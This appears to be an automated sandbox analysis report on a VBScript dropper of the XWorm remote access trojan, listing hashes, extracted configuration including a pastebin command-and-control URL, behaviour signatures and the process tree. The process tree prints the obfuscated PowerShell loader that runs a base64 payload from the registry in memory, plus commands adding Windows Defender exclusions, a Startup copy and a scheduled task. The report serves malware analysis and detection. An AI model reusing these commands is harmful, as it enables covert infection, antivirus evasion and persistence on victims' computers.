Analysis

  • max time kernel
    33s
  • max time network
    54s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250218-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20250218-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    07/03/2025, 21:04

General

  • Target

    FUD.vbs

  • Size

    97KB

  • MD5

    457f2d4041d1873ebb7c33d0ccd41469

  • SHA1

    b70963db9423a72ae7a0e7b25ab48510c27af6c0

  • SHA256

    fc6447a6f4407fe43119c51d7c070a23c2b21f3bd1ed80d45245a49aa8e2fa3b

  • SHA512

    6e623f91e07ce6ecb50581cd8d45c67a7d37f2a77ebe2d1b208722ea12de595dfcea75c1946d37b8f430978beb2227d074857f0b1749daba562ecac0baae65ec

  • SSDEEP

    1536:p6GSeymei7zi/ABajxVOS2DAcsPteLg0xHEe+4ho7xnxPgGlyNowKBjh:p6GKmV7zqAB852DActMne+UIDzwNotB1

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    injector.exe

  • pastebin_url

    https://pastebin.com/raw/DSFaHH8B

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.vbs'; $lionfish = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $lionfish = -join $lionfish[-1..-$lionfish.Length];[<##>AppDomain<##>]::<##>('IwuurrentDomain'.replace('Iwu','C'))<##>.<##>('afterlifesoad'.replace('afterlifes','L'))([Convert]::FromBase64String($lionfish))<##>.<##>('HormuzntryPoint'.replace('Hormuz','E'))<##>.<##>('Infreakishoke'.replace('freakish','v'))($Null,$Null)<##>;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\injector.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'injector.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1912
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "injector" /tr "C:\Users\Admin\injector.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5108

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f0f59cccd39a3694e0e6dfd44d0fa76d

    SHA1

    fccd7911d463041e1168431df8823e4c4ea387c1

    SHA256

    70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

    SHA512

    5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    db223e6a6930c11ea4786cb99ee7b25c

    SHA1

    e2dd6c28cb79dcf3424b55234ea627e590ec80b9

    SHA256

    aa54c6b65dfea35f2edb8a90e866a0632fe6e2be002ed509cb794a1c2befcee9

    SHA512

    7d827f5b81beae0274a0a34c3cdc24c7ef0e853231aa4aa61be765bca4e205fe776828e8c8b8fb55c542ae0f941b054efb6d7ac8c3fd57ddadf4114523d65228

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    3c24e75e9855bcbefbef9f6b68ae286f

    SHA1

    6ceb908c0875df779ac14df6b0f8d8198580ce2c

    SHA256

    e57af5784710dfa6a9e65effe44b2c455bd01ebb371001cc10b8c19b3e9e69de

    SHA512

    3bd0b6733bd3f53f897d2b9bf4c778a8f5ab19d0cb634dd59793f06c5c37a04c59cd4328ed993e214e4ffd6fca319de7b83bdabbb166c9b06cacc61647d5be1a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j4dqt14o.bkl.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/5992-12-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

  • memory/5992-14-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

  • memory/5992-15-0x000002657D5F0000-0x000002657D608000-memory.dmp

    Filesize

    96KB

  • memory/5992-13-0x000002657D640000-0x000002657D684000-memory.dmp

    Filesize

    272KB

  • memory/5992-0-0x00007FFE6DD33000-0x00007FFE6DD35000-memory.dmp

    Filesize

    8KB

  • memory/5992-11-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

  • memory/5992-1-0x000002657D100000-0x000002657D122000-memory.dmp

    Filesize

    136KB

  • memory/5992-61-0x00007FFE6DD33000-0x00007FFE6DD35000-memory.dmp

    Filesize

    8KB

  • memory/5992-62-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

  • memory/5992-64-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB

  • memory/5992-68-0x00007FFE6DD30000-0x00007FFE6E7F2000-memory.dmp

    Filesize

    10.8MB